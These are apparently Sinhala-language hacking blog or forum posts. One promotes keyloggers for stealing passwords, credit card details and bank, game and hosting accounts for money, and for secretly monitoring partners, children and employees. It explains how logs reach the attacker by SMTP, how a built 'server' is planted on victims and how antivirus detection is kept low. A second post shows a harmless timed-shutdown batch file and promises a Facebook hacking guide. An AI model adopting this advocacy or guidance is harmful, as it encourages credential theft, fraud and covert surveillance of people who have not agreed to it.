කස්ටිය බලයි මොකද මේ කී-ලොගර් වලින් වෙන්නෙ කියලා, අන්න ඒකනිසා තමයි මම ටස් ගාලා සරල විදිහට ඔයාලට කියලා දෙන්න යන්නේ මොනවද කරගන්න පුලුවන් වැඩ කියලා...
#1 දත්ත ඉස්සීම
_____________
මේක තමයි කී-ලොගර් එකක Main Use එක, Usernames, Passwords, Credit Card Detals .... etc .... ඔන්න ඔය ජාතියේ ඩේටා එකතු කරන එක තමයි මුගේ වැඩේ...
#2 Monitoring කීරීම සදහා
_____________________
දැන් හිතහල්ලකො මෙහෙම... ගෑනි හොර කරනවද කියල අල්ලන්න උඹ පස්සේන් යනව වගේ වැඩක් තමයි මේ මොනිටරින් වලින් වෙන්නෙ, හොර වැඩ අල්ලගන්න මරුම බඩුවක් තමයි කී-ලොගර් එකක් කියන්නේ...
කෙල්ල වෙන කොල්ලො එක්ක චැට් කොරනවද කියල බලන්න... ලමය වැල බලනවද කියලා බලන්න.... වැඩ කරන එවුන් අයිස් ගහනවද කියල බලන්න වගේ වැඩ වලට තමයි මේක සෙට් වෙන්නේ.. හොර වැඩ ඔක්කොම මාට්ටු..
#3 සල්ලි හම්බ කරන්න
__________________
හ්ම්ම්... කස්ටිය බලයි කොහොමද මේක වෙන්නෙ කියලා, සරලයිනේ කේස් එක
1 File Hosting Web Site Accounts ( FileServe , Hotfile ... Ect .. )2 Online Bank Accounts 3 Hosting Accounts4 Game Accounts5 Premium Accounts of Web Sites[6 Domain Name Accounts
ඔන්න ඔය උඩ තියනවා වගේ බඩු හම්බුනොත් ඉතින් සල්ලි තමා, හොර වැඩ වලට හොදම වැඩේ මේක තමා... 2000 ඉදන් එෆ්.බී.අයි එකත් මේක ගොඩාක් පාවිච්චි කොර කියලා ආරන්චි තියනවා... (මම දන්නෙ නෑ. ආරංචි විතරයි බං.)
දරුණු වචන සරල විදිහට - ඔන්න බලන්නකො
#1 Keyboard Hooking
අපි ගේම දෙන පොර කොටන අකුරක්ම කී-ලොගර් එකෙන් වෙනම වේරියබල්
[ Variable = Memory Location ] එකකට සේව් කරගන්නවා... අන්න ඒකට තමයි කී-බෝඩ් හූකින් කියන්නේ
#2 Keystrokes
අපි කී-බෝඩ් එකේ කොටන ඒවට තමයි මේ කී-ස්ට්රොක් කියන්නේ
#3 Logs
යමිකිසි කාලයක් ඇතුලත පිලිවෙලට එකතුකරන ලද Keystrokes එකතුව
#4 SMTP
මේක තමයි අපි ඊ-මේල් වලින් ( Gmail,Yahoo,Hotmail... ) ලොග්ස් ගෙන්න ගන්න කොට පාචිච්චි කොරන Protocol එක
#4 Server
මේක තමයි අපි ඊ-මේල් වලින් ( Gmail,Yahoo,Hotmail... ) මේක තමයි රෙමොට් කී-ලොගර් එකකින් හදල දෙන බඩුව අනික් එවුන්ට බස්සන්න... මම උඩහ මේ ගැන හොදට පැහැදිලි කොරෝ.
#5 Detection
ඇන්ටිවයිර්ස් සහ අනන් මනන් ගාඩ් වලින් අපි හදන කී-ලොගර් එක අල්ල ගත්තාම තමයි ඩෙටෙක්ට් උනා කියන්නේ.. Detection Level එක පුලුවන් තරම් අඩු කරන්න බලනන් ඕනේ.
ඉස්සරහට මේ Server, Stubs, Crypters සහ අනන් මනන් ජාති ගැන මම වෙනම Thread එකක් දානවා වෙනම මොකද දැන් මගේ පුකත් රිදෙනවා.. මේක ටයිප් කරලාම.... දැන් මම මොනවා හරි ගසලා ගොහින් හොදට නිදාගනන්වා....
හැක් කොරන්න ඉස්සරවෙලා මේවා දැනගෙන ඉදපන් නැත්තම් නොන්ඩි කන්න වෙන්නේ ....
අපි කැපුණා....
ජය ශ්රී ! එහෙනම් ඉතින් මම ගියා. මේක වෙනකොහේවත් දාන්න එපා කියලා තමයි ඉල්ලන්නෙ. මොකද යකඩයා ටීම් එකෙන් ගේම ඉල්ලපු එවුන් දන්නවා අපි කරන වැඩ ගැන.
Batch file එකෙන් කොම්පියුටරේ Shutdown කරමු.
මේ තියෙන්නෙ මගෙ අළුත් බ්ලොග් එක. මේක පටන් ගත්තෙ හැකින් උගන්වන්න තමයි. ඒ වගේම නොදන්න දේවල් ඕනෙම දෙයක් අහන්න පුළුවන්. පළවෙනි පෝස්ට් එක නිසා පොඩි දෙයක් කියලා දෙන්නම්.
මේකේ කියන්න යන්නේ *.bat file එකකින් නිශ්චිත කාලයකදී කොම්පියුටරේ Shutdown කරන හැටි....
අපේ ගෙදරට පඩි කොල්ලෝ වගයක් ඇවිල්ලා මගේ කොම්පියුටරේ game ගහනොකොට මට කොම්පියුටරේ off කරන්න විදියකුත් නැ...උන් එතනින් නැගිටින්නෙත් නැ.. ඒ වගේ වෙලාවට තමයි මේක ඕන වෙන්නේ..
හරි...වැඩේට බහිමුකො...
ඉස්සෙල්ලම notepad එක open කරගන්න...(by Pressing WinKey+R and type "notepad")
දැන් මෙන්න මේ code එක copy කරලා paste කරගන්න...
shutdown -s -t 45
මේ code එකේ 45 කියල තියෙන තැනට ඔයාට computer එක off කරන්න ඕන කොච්චර වෙලාවකට පස්සෙද කියල දාන්න ඕන.. තත්පර වලින්...
ඊලගට file>save click කරන්න...
දැන් save as type කියන එකට All Files කියල දෙන්න...
FIlename කියන තැනට ඕන නමක් දීල ...මතක ඇතුව අන්තිමට ".bat" කියල දාන්න..
දැන් ඕන තැනකට ගිහිල්ල save කරගන්න...
දැන් ඊට පස්සේ ඕක ඔයාට ඕන වුනු වෙලාවක double click කරලා යන්න..
එතකොට නිකම්ම ඒ වෙලාව ඇතුලත computer එක Shutdown වේවි..
එහෙනම් අපි ගියා...
අව්ලක් තියේනං කමෙන්ට් එකක් දාන්න හොදේ.. එහෙනම් ෆේස්බුක් හැක් කරන්නෙ කොහොමද කියලා ඊළගට දාන්නම්. ෆිෂින් වලින් නම් නෙවෙයි ඈ....